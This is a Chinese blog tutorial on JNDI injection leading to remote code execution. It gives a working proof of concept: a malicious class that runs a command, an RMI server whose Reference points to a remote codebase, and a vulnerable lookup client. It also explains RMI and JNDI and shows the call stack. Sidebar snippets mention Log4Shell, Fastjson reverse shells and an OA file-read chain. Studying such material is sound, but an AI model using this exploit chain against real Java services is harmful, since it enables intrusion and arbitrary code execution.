命令注入_JNDI注入远程命令执行

最新推荐文章于 2024-06-25 18:04:38 发布
最新推荐文章于 2024-06-25 18:04:38 发布
阅读量3.8k 收藏 4
点赞数 1
文章标签: 命令注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34897593/article/details/112624098
版权

在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。JNDI注入利用方式比较简单。我们先看一下poc代码。

首先在攻击机上部署恶意代码exp.class。exp.class放在http://127.0.0.1:8001/目录下,所以攻击机需要开启http服务和rmi服务。

import java.io.IOException;import java.rmi.RemoteException;import java.rmi.server.UnicastRemoteObject;public class exp extends UnicastRemoteObject {    public exp() throws IOException {        super();        System.out.println("exp exec");        Runtime.getRuntime().exec("calc");    }}

在攻击机上部署rmi服务(rmi sever)

import com.sun.jndi.rmi.registry.ReferenceWrapper;import javax.naming.NamingException;import javax.naming.Reference;import java.rmi.RemoteException;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;public class server {    public static void main(String[] args) throws RemoteException, NamingException {        Registry registry = LocateRegistry.createRegistry(1099);        Reference reference =new Reference("exp","exp","http://127.0.0.1:8001/");        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);                registry.rebind("aa", referenceWrapper);        System.out.println("======= 启动RMI服务成功! =======");    }}

在靶机上存在有ctx.lookup("payload")payload为可控参数代码(client)

import javax.naming.Context;import javax.naming.InitialContext;public class client {    public static void main(String[] args) throws Exception {        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");        String uri = "rmi://127.0.0.1:1099/aa";        Context ctx = new InitialContext();        ctx.lookup(uri);    }}

jdk1.8.121之后需要添加System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true")

如此就可以执行任意命令了。这里涉及到了JNDI和RMI,懂得自然懂,不懂的话,看这里。

我们需要先了解几个知识点:

1.什么是RMI

2.什么是JNDI

3.为什么Reference要引用一个远程的类

4.JNDI调用栈

RMI:

      远程方法调用是分布式编程中的一个基本思想。实现远程方法调用的技术有很多,比如:CORBA、WebService,这两种都是独立于编程语言的。而RMI(Remote Method Invocation)是专为Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法。RMI依赖的通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),该协议为Java定制,要求服务端与客户端都为Java编写。这个协议就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。在RMI中对象是通过序列化方式进行编码传输的。

     通俗来讲,rmi是客户端调用服务器的方法,并在服务端执行后返回结果。与JNDI不同,JNDI注入攻击者是rmi的服务端。JDK1.8.121之前版本rmi本身就有反序列化漏洞。rmi示例:

客户端:

import java.rmi.AccessException;import java.rmi.NotBoundException;import java.rmi.RemoteException;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;public class RegistryClient {    public static void main(String[] args) {        try {            Registry registry = LocateRegistry.getRegistry(1099);            HelloRegistryFacade hello;            hello = (HelloRegistryFacade) registry.lookup("HelloRegistry");            String response = hello.helloWorld("kali");            System.out.println("=======> " + response + " <=======");        } catch (NotBoundException | RemoteException e) {            e.printStackTrace();        }    }}
import java.rmi.Remote;import java.rmi.RemoteException;public interface HelloRegistryFacade extends Remote {    String helloWorld(String name) throws RemoteException;}

服务端:

import java.rmi.RemoteException;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;public class rmi_server {    public static void main(String[] args) {        try {            // 本地主机上的远程对象注册表Registry的实例,默认端口1099            Registry registry = LocateRegistry.createRegistry(1099);            // 创建一个远程对象            HelloRegistryFacadeImpl hello = new HelloRegistryFacadeImpl();            // 把远程对象注册到RMI注册服务器上,并命名为HelloRegistry            registry.rebind("HelloRegistry", (HelloRegistryFacadeImpl) hello);            System.out.println("======= 启动RMI服务成功! =======");        } catch (RemoteException e) {            e.printStackTrace();        }    }}
import java.rmi.Remote;import java.rmi.RemoteException;public interface HelloRegistryFacade extends Remote {    String helloWorld(String name) throws RemoteException;}
import java.rmi.RemoteException;import java.rmi.server.UnicastRemoteObject;public class HelloRegistryFacadeImpl  extends UnicastRemoteObject implements HelloRegistryFacade{    public HelloRegistryFacadeImpl() throws RemoteException {        super();    }    @Override    public String helloWorld(String name) {        return "[Registry] 你好! " + name;    }}

JNDI:

       简单来说,JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。比如可以利用JNDI在局域网上定位一台打印机,也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。

String uri = "rmi://127.0.0.1:1099/aa";Context ctx = new InitialContext();ctx.lookup(uri);

这是指通过context对象访问远程rmi对象。整个过程如下:

  1. 目标代码中调用了InitialContext.lookup(URI),且URI为用户可控;

  2. 攻击者控制URI参数为恶意的RMI服务地址,如:rmi://hacker_rmi_server//name;

  3. 攻击者RMI服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;

  4. 目标在进行lookup()操作时,会动态加载并实例化Factory类,接着调用factory.getObjectInstance()获取外部远程对象实例;

  5. 攻击者可以在Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码,达到RCE的效果;

    InitialContext.lookup()调用栈为:

    getURLOrDefaultInitCtx("aa");getURLContext("aa");RegistryContext.lookup("aa");RegistryContext.decodeObject(referenceWrapper,"aa");NamingManager.getObjectInstance();factory.getObjectInstance(refInfo, name, nameCtx,environment);//创建恶意类对象

353b871e5b03124a2ea2270b85231af6.png

e822485214776411c119f2a01cacf36f.png

632e2557c86d37ba2433352b541492b1.png

0881927142e05ff0ee0a756560d65795.png

58aa82dbaff23ef32874bc6ee14b8b0a.png

为什么Reference要引用一个远程的类?因为服务端传给客户端的是一个Reference对象,如果这个对象里没有factory和factoryLaction的话只会在客户端本地查找恶意类,但是恶意类是存放的远程的。

每日优质搜罗
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JNDI注入学习1
08-03
JNDI注入执行过程中,`getObjectFactoryFromReference`方法位于调用栈中,这表明了在解析`Reference`对象并尝试获取对象工厂的流程中,恶意代码已经开始执行。 **防御策略** 为了防止JNDI注入攻击,开发者应...
log4j远程执行漏洞,测试源码
12-22
这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实现远程代码执行,对受影响系统的安全性构成极大威胁。 描述中提到“解压即用”,这可能是指提供了一个测试环境或测试源码,以便用户能够快速理解漏洞的工作...
JNDI注入
qq_64201116的博客
04-20 844
Java命名目录接口(Java Naming and Directory Interface),作用是为JAVA应用程序提供命名和目录访问服务的API(application programming interface)。* 轻量级目录访问协议 (LDAP)* 通用对象请求代理体系结构 (CORBA) 通用对象服务 (COS) 名称服务* Java 远程方法调用 (RMI) 注册表* 域名服务 (DNS)前三种都是支持一种字符串就绑定一种对象注:这里JDNI注入就可以用到我们之前的RMI的知识了。
X凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合
thelostworld
05-14 1143
X凌OA系统任意文件读取-SSRF+JNDI远程命令执行一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时利用ssrf可远程命令执行。二、漏洞影响蓝凌OA三、利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件读取路径:/WEB-INF/KmssConfig/admin.properties读取文件:POC:POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127
蓝凌(Landray)OA漏洞常见RCE
最新发布
baimao__Ch的博客
06-25 1185
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
远程注入代码
diheqiu3577的博客
07-09 454
1.复制代码的编写原则:   不能有全局变量   不能使用常量字符串   不能使用系统调用   不能嵌套调用其他函数 1 // 远程代码注入.cpp : 定义控制台应用程序的入口点。 2 // 3 4 #include "stdafx.h" 5 #include <windows.h> 6 //自己定义个结构体,...
蓝凌OA SSRF+JNDI远程命令执行
MD@@nr丫卡uer
05-13 4310
漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限 FOFA app=“Landray-OA系统” 漏洞复现 利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件 /WEB-INF/KmssConfig/admin.properties 发送请求包 POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host:
JNDI注入详解
m0_60571990的博客
03-02 4100
JNDI注入详解
技术专栏 _ 深入理解JNDI注入与Java反序列化漏洞利用.pdf
09-18
攻击者可以利用FastJson在反序列化过程中的漏洞,通过JNDI注入实现远程执行代码。 接下来,我们来看一下RMI的具体使用流程。RMI调用过程涉及远程对象和本地对象,远程对象是指那些不在本地JVM中但可以被本地代码...
jndi-tool JNDI服务利用工具
01-06
在某些版本的Fastjson中,存在远程代码执行RCE)漏洞,攻击者可以利用这个漏洞通过JNDI注入执行恶意代码。 另一个涉及JNDI的高知名度漏洞是Log4j 2.x的CVE-2021-44228,也被称为“Log4Shell”漏洞。Log4j是一个...
rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
05-04
用于JNDI注入攻击的恶意LDAP服务器。 描述 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了执行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: ...
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
Log4j-2.15.0之前版本通过JNDI远程拉取代码本地执行复现
Chdaring的博客
12-19 490
1. 原理 log4j具有一个功能lookups的功能,它能够支持你在日志打印中通过简单的表达式输出操作系统、Java相关的信息,如下代码: @Slf4j public class Log4j2Main { public static void main(String[] args) { log.info("runtime: {}", "${java:runtime}"); log.warn("vm: {}", "${java:vm}"); log.error("os: {}"
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5618
JDNI注入总结
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2662
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行
开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞
LJQClqjc的博客
09-02 1408
开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞
JNDI和Java RMI远程调用(二)
06-07 403
利用 JNDI 定位资源 JNDI 提供了一套标准的接口来定位资源 ( 用户、网络、机器、对象和服务等 ) ,比如可以利用 JNDI 在局域网上定位一台打印机,也可以用 JNDI 来定位数据库服务或一个远程 Java 对象。 JNDI 在 Java EE 中使用十分广泛;包括 EJB 、 RMI-IIOP...
RCE命令注入
m0_75178803的博客
06-18 552
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入
Java代码审计——apache log4j 远程命令执行(CVE-2021-44228)
王嘟嘟的博客
12-13 1875
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
"深入学习JNDI注入: 防范远程攻击和恶意代码
总之,JNDI注入是一种具有危害性的攻击技术,通过构造恶意的JNDI URI来执行恶意代码。为了防范此类攻击,我们需要加强对JNDI接口的安全性,并采取相应的安全措施,如限制访问权限、验证用户输入等。只有保持对JNDI...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值